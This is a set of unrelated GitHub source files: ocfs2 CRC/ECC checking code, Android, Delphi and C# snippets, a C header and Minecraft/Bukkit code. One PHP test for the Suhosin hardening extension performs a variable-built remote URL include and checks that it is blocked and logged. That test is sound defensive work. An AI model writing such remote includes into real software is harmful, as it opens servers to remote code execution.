cpu_to_le32(bc_crc32e); bc->bc_ecc = cpu_to_le16(bc_ecc); return rc; } /* * This function generates check information for a list of buffer_heads. * bhs is the blocks to be checked. bc is a pointer to the * ocfs2_block_check structure describing the crc32 and the ecc. * * bc should be a pointer inside data, as the function will * take care of zeroing it before calculating the check information. If * bc does not point inside data, the caller must make sure any inline * ocfs2_block_check structures are zeroed. * * The data buffer must be in on-disk endian (little endian for ocfs2). * bc will be filled with little-endian values and will be ready to go to * disk. */ void ocfs2_block_check_compute_bhs(struct buffer_head **bhs, int nr, struct ocfs2_block_check *bc) { int i; u32 crc, ecc; BUG_ON(nr < 0); if (!nr) return; memset(bc, 0, sizeof(struct ocfs2_block_check)); for (i = 0, crc = ~0, ecc = 0; i < nr; i++) { crc = crc32_le(crc, bhs[i]->b_data, bhs[i]->b_size); /* * The number of bits in a buffer is obviously b_size*8. * The offset of this buffer is b_size*i, so the bit offset * of this buffer is b_size*8*i. */ ecc = (u16)ocfs2_hamming_encode(ecc, bhs[i]->b_data, bhs[i]->b_size * 8, bhs[i]->b_size * 8 * i); } /* * No ecc'd ocfs2 structure is larger than 4K, so ecc will be no * larger than 16 bits. */ BUG_ON(ecc > USHRT_MAX); bc->bc_crc32e = cpu_to_le32(crc); bc->bc_ecc = cpu_to_le16((u16)ecc); } /* * This function validates existing check information on a list of * buffer_heads. Like _compute_bhs, the function will take care of * zeroing bc before calculating check codes. If bc is not a pointer * inside data, the caller must have zeroed any inline * ocfs2_block_check structures. * * Again, the data passed in should be the on-disk endian. */ int ocfs2_block_check_validate_bhs(struct buffer_head **bhs, int nr, struct ocfs2_block_check *bc, struct ocfs2_blockcheck_stats *stats) { int i, rc = 0; u32 bc_crc32e; u16 bc_ecc; u32 crc, ecc, fix; BUG_ON(nr < 0); if (!nr) return 0; ocfs2_blockcheck_inc_check(stats); bc_crc32e = le32_to_cpu(bc->bc_crc32e); bc_ecc = le16_to_cpu(bc->bc_ecc); memset(bc, 0, sizeof(struct ocfs2_block_check)); /* Fast path - if the crc32 validates, we're good to go */ for (i = 0, crc = ~0; i < nr; i++) crc = crc32_le(crc, bhs[i]->b_data, bhs[i]->b_size); if (crc == bc_crc32e) goto out; ocfs2_blockcheck_inc_failure(stats); mlog(ML_ERROR, "CRC32 failed: stored: %u, computed %u. Applying ECC.\n", (unsigned int)bc_crc32e, (unsigned int)crc); /* Ok, try ECC fixups */ for (i = 0, ecc = 0; i < nr; i++) { /* * The number of bits in a buffer is obviously b_size*8. * The offset of this buffer is b_size*i, so the bit offset * of this buffer is b_size*8*i. */ ecc = (u16)ocfs2_hamming_encode(ecc, bhs[i]->b_data, bhs[i]->b_size * 8, bhs[i]->b_size * 8 * i); } fix = ecc ^ bc_ecc; for (i = 0; i < nr; i++) { /* * Try the fix against each buffer. It will only affect * one of them. */ ocfs2_hamming_fix(bhs[i]->b_data, bhs[i]->b_size * 8, bhs[i]->b_size * 8 * i, fix); } /* And check the crc32 again */ for (i = 0, crc = ~0; i < nr; i++) crc = crc32_le(crc, bhs[i]->b_data, bhs[i]->b_size); if (crc == bc_crc32e) { ocfs2_blockcheck_inc_recover(stats); goto out; } mlog(ML_ERROR, "Fixed CRC32 failed: stored: %u, computed %u\n", (unsigned int)bc_crc32e, (unsigned int)crc); rc = -EIO; out: bc->bc_crc32e = cpu_to_le32(bc_crc32e); bc->bc_ecc = cpu_to_le16(bc_ecc); return rc; } /* * These are the main API. They check the superblock flag before * calling the underlying operations. * * They expect the buffer(s) to be in disk format. */ void ocfs2_compute_meta_ecc(struct super_block *sb, void *data, struct ocfs2_block_check *bc) { if (ocfs2_meta_ecc(OCFS2_SB(sb))) ocfs2_block_check_compute(data, sb->s_blocksize, bc); } int ocfs2_validate_meta_ecc(struct super_block *sb, void *data, struct ocfs2_block_check *bc) { int rc = 0; struct ocfs2_super *osb = OCFS2_SB(sb); if (ocfs2_meta_ecc(osb)) rc = ocfs2_block_check_validate(data, sb->s_blocksize, bc, &osb->osb_ecc_stats); return rc; } void ocfs2_compute_meta_ecc_bhs(struct super_block *sb, struct buffer_head **bhs, int nr, struct ocfs2_block_check *bc) { if (ocfs2_meta_ecc(OCFS2_SB(sb))) ocfs2_block_check_compute_bhs(bhs, nr, bc); } int ocfs2_validate_meta_ecc_bhs(struct super_block *sb, struct buffer_head **bhs, int nr, struct ocfs2_block_check *bc) { int rc = 0; struct ocfs2_super *osb = OCFS2_SB(sb); if (ocfs2_meta_ecc(osb)) rc = ocfs2_block_check_validate_bhs(bhs, nr, bc, &osb->osb_ecc_stats); return rc; }
{ "pile_set_name": "Github" }
package com.example.firstapp import androidx.appcompat.app.AppCompatActivity import android.os.Bundle class MainActivity : AppCompatActivity() { override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) setContentView(R.layout.activity_main) } }
{ "pile_set_name": "Github" }
package abi36_0_0.org.unimodules.interfaces.facedetector; import android.content.Context; public interface FaceDetectorProvider { FaceDetector createFaceDetectorWithContext(Context context); }
{ "pile_set_name": "Github" }
library isapiapp; uses Winapi.ActiveX, System.Win.ComObj, Web.WebBroker, Web.Win.ISAPIApp, Web.Win.ISAPIThreadPool, MainDataModuleUnit in '..\..\winecellarserver\MainDataModuleUnit.pas' {WineCellarDataModule: TDataModule}, MainWebModuleUnit in '..\..\winecellarserver\MainWebModuleUnit.pas' {wm: TWebModule}, WineCellarAppControllerU in '..\..\winecellarserver\WineCellarAppControllerU.pas', WinesBO in '..\..\winecellarserver\WinesBO.pas'; {$R *.res} exports GetExtensionVersion, HttpExtensionProc, TerminateExtension; begin CoInitFlags := COINIT_MULTITHREADED; Application.Initialize; Application.WebModuleClass := WebModuleClass; Application.Run; end.
{ "pile_set_name": "Github" }
Running with -XNoAlternativeLayoutRule Running with -XAlternativeLayoutRule Running with -XAlternativeLayoutRule -XAlternativeLayoutRuleTransitional
{ "pile_set_name": "Github" }
/////////////////////////////////////////////////////////////////////////////// // /// \file tuklib_common.h /// \brief Common definitions for tuklib modules // // Author: Lasse Collin // // This file has been put into the public domain. // You can do whatever you want with this file. // /////////////////////////////////////////////////////////////////////////////// #ifndef TUKLIB_COMMON_H #define TUKLIB_COMMON_H // The config file may be replaced by a package-specific file. // It should include at least stddef.h, inttypes.h, and limits.h. #include "tuklib_config.h" // TUKLIB_SYMBOL_PREFIX is prefixed to all symbols exported by // the tuklib modules. If you use a tuklib module in a library, // you should use TUKLIB_SYMBOL_PREFIX to make sure that there // are no symbol conflicts in case someone links your library // into application that also uses the same tuklib module. #ifndef TUKLIB_SYMBOL_PREFIX # define TUKLIB_SYMBOL_PREFIX #endif #define TUKLIB_CAT_X(a, b) a ## b #define TUKLIB_CAT(a, b) TUKLIB_CAT_X(a, b) #ifndef TUKLIB_SYMBOL # define TUKLIB_SYMBOL(sym) TUKLIB_CAT(TUKLIB_SYMBOL_PREFIX, sym) #endif #ifndef TUKLIB_DECLS_BEGIN # ifdef __cplusplus # define TUKLIB_DECLS_BEGIN extern "C" { # else # define TUKLIB_DECLS_BEGIN # endif #endif #ifndef TUKLIB_DECLS_END # ifdef __cplusplus # define TUKLIB_DECLS_END } # else # define TUKLIB_DECLS_END # endif #endif #if defined(__GNUC__) && defined(__GNUC_MINOR__) # define TUKLIB_GNUC_REQ(major, minor) \ ((__GNUC__ == (major) && __GNUC_MINOR__ >= (minor)) \ || __GNUC__ > (major)) #else # define TUKLIB_GNUC_REQ(major, minor) 0 #endif #if TUKLIB_GNUC_REQ(2, 5) # define tuklib_attr_noreturn __attribute__((__noreturn__)) #else # define tuklib_attr_noreturn #endif #if (defined(_WIN32) && !defined(__CYGWIN__)) \ || defined(__OS2__) || defined(__MSDOS__) # define TUKLIB_DOSLIKE 1 #endif #endif
{ "pile_set_name": "Github" }
--TEST-- Include_once "Temp Variable URL"; --SKIPIF-- <?php include "../skipifcli.inc"; ?> --INI-- suhosin.log.syslog=0 suhosin.log.sapi=255 suhosin.log.script=0 suhosin.log.phpscript=0 suhosin.executor.include.whitelist= suhosin.executor.include.blacklist= --FILE-- <?php $var = "http://127.0.0.1/"; $app = "?"; include_once $var.$app; ?> --EXPECTF-- ALERT - Include filename ('http://127.0.0.1/?') is a URL that is not allowed (attacker 'REMOTE_ADDR not set', file '%s', line 4)
{ "pile_set_name": "Github" }
using System; using System.ComponentModel; using System.Drawing; using DevExpress.ExpressApp.Editors; using DevExpress.Utils; using DevExpress.Utils.Controls; using DevExpress.Utils.Design; using DevExpress.XtraGrid; using DevExpress.XtraGrid.Design; namespace Xpand.ExpressApp.Win.ListEditors.GridListEditors.ColumnView.Design { public interface IColumnViewEditor : ISupportFooter { [Browsable(false)] [DesignerSerializationVisibility(DesignerSerializationVisibility.Hidden)] bool OverrideViewDesignMode { get; set; } event EventHandler<CustomGridViewCreateEventArgs> CustomGridViewCreate; } public class CustomGridViewCreateEventArgs : HandledEventArgs { public CustomGridViewCreateEventArgs(GridControl gridControl) { GridControl = gridControl; } public DevExpress.XtraGrid.Views.Base.ColumnView GridView { get; set; } public GridControl GridControl { get; private set; } } public abstract class ColumnViewDesigner : BaseDesigner { [ThreadStatic] static ImageCollection _largeImages; [ThreadStatic] static ImageCollection _smallImages; static ImageCollection LargeImages { get { return _largeImages ?? (_largeImages = ImageHelper.CreateImageCollectionFromResources("DevExpress.XtraGrid.Images.icons32x32.png", typeof(BaseGridDesigner).Assembly, new Size(32, 32))); } } static ImageCollection SmallImages { get { return _smallImages ?? (_smallImages = ImageHelper.CreateImageCollectionFromResources("DevExpress.XtraGrid.Images.icons16x16.png", typeof(BaseGridDesigner).Assembly, new Size(16, 16))); } } protected override object LargeImageList { get { return LargeImages; } } protected override object SmallImageList { get { return SmallImages; } } protected override void CreateGroups() { Groups.Clear(); // DesignerGroup group = Groups.Add(DesignerGroupType.Main.ToString(), "Main Grid settings (adjust the view, columns, bands, and specify in-place editors and summaries).", null, true); // var designerType = Type.GetType("DevExpress.XtraGrid.FeatureBrowser.FeatureBrowserGridMainFrame, DevExpress.XtraGrid" + XafApplication.CurrentVersion + ".Design"); // if (designerType != null) // group.Add("Feature Browser", "Locate relevant options by features.", designerType, GetDefaultLargeImage(3), GetDefaultSmallImage(3), null); // designerType = Type.GetType("DevExpress.XtraGrid.Frames.ViewsEditor, DevExpress.XtraGrid" + XafApplication.CurrentVersion + ".Design"); // if (designerType != null) // group.Add("View Repository", "Manage views.", designerType, GetDefaultLargeImage(6), GetDefaultSmallImage(6), true); // designerType = Type.GetType("DevExpress.XtraGrid.Frames.ColumnDesigner, DevExpress.XtraGrid" + XafApplication.CurrentVersion + ".Design"); // if (designerType != null) // group.Add("Columns", "Adjust the Column collection of the current view, assign in-place editors to columns and specify total summaries.", designerType, GetDefaultLargeImage(1), GetDefaultSmallImage(1), null); // designerType = Type.GetType("DevExpress.XtraGrid.Frames.PersistentRepositoryGridEditor, DevExpress.XtraGrid" + XafApplication.CurrentVersion + ".Design"); // if (designerType != null) // group.Add("In-place Editor Repository", "Adjust the editors used for in-place editing.", designerType, GetDefaultLargeImage(7), GetDefaultSmallImage(7), true); } } }
{ "pile_set_name": "Github" }
{ "type": "minecraft:stonecutting", "ingredient": { "item": "techreborn:steel_storage_block" }, "result": "techreborn:steel_storage_block_wall", "count": 1 }
{ "pile_set_name": "Github" }
package org.bukkit.event.entity; import org.bukkit.entity.LivingEntity; /** * Called when a creature is spawned into a world. * <p> * If a Creature Spawn event is cancelled, the creature will not spawn. */ public class CreatureSpawnEvent extends EntitySpawnEvent { private final SpawnReason spawnReason; public CreatureSpawnEvent(final LivingEntity spawnee, final SpawnReason spawnReason) { super(spawnee); this.spawnReason = spawnReason; } @Override public LivingEntity getEntity() { return (LivingEntity) entity; } /** * Gets the reason for why the creature is being spawned. * * @return A SpawnReason value detailing the reason for the creature being * spawned */ public SpawnReason getSpawnReason() { return spawnReason; } /** * An enum to specify the type of spawning */ public enum SpawnReason { /** * When something spawns from natural means */ NATURAL, /** * When an entity spawns as a jockey of another entity (mostly spider * jockeys) */ JOCKEY, /** * When a creature spawns due to chunk generation */ CHUNK_GEN, /** * When a creature spawns from a spawner */ SPAWNER, /** * When a creature spawns from an egg */ EGG, /** * When a creature spawns from a Spawner Egg */ SPAWNER_EGG, /** * When a creature spawns because of a lightning strike */ LIGHTNING, /** * When a snowman is spawned by being built */ BUILD_SNOWMAN, /** * When an iron golem is spawned by being built */ BUILD_IRONGOLEM, /** * When a wither boss is spawned by being built */ BUILD_WITHER, /** * When an iron golem is spawned to defend a village */ VILLAGE_DEFENSE, /** * When a zombie is spawned to invade a village */ VILLAGE_INVASION, /** * When an animal breeds to create a child */ BREEDING, /** * When a slime splits */ SLIME_SPLIT, /** * When an entity calls for reinforcements */ REINFORCEMENTS, /** * When a creature is spawned by nether portal */ NETHER_PORTAL, /** * When a creature is spawned by a dispenser dispensing an egg */ DISPENSE_EGG, /** * When a zombie infects a villager */ INFECTION, /** * When a villager is cured from infection */ CURED, /** * When an ocelot has a baby spawned along with them */ OCELOT_BABY, /** * When a silverfish spawns from a block */ SILVERFISH_BLOCK, /** * When an entity spawns as a mount of another entity (mostly chicken * jockeys) */ MOUNT, /** * When an entity spawns as a trap for players approaching */ TRAP, /** * When an entity is spawned as a result of ender pearl usage */ ENDER_PEARL, /** * When an entity is spawned as a result of the entity it is being * perched on jumping or being damaged */ SHOULDER_ENTITY, /** * When a creature is spawned by plugins */ CUSTOM, /** * When an entity is missing a SpawnReason */ DEFAULT } }
{ "pile_set_name": "Github" }